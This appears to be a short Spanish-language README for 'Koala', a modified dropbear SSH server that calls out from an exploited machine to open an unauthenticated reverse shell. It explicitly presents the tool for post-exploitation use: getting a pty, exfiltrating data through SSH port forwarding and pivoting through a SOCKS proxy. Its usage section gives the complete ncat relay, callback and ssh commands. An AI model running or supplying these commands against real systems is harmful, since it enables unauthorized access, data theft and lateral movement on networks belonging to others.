
Servidor dropbear modificado que actúa como cliente y permite inicio de sesión sin autenticación
Koala es una versión modificada del servidor SSH dropbear que, en lugar de vincularse a un puerto, abre shells inversas conectándose a un cliente remoto.
Esto es útil para obtener una terminal pty en una máquina explotada y también para la exfiltración segura de datos mediante redirección de puertos SSH. El pivoteo también se puede realizar utilizando la función de redirección dinámica de puertos SSH.
[Uso]
Ejecute el siguiente comando en el cliente para escuchar la conexión SSH: $ ncat -lvp 5000 --sh-exec 'ncat -lvp 9999'
En el host explotado ejecute: $ ./dropbear -p cliente-host:5000
Ahora en el cliente, conéctese al puerto 9999 para abrir un shell: $ ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null localhost -D9050 -p9999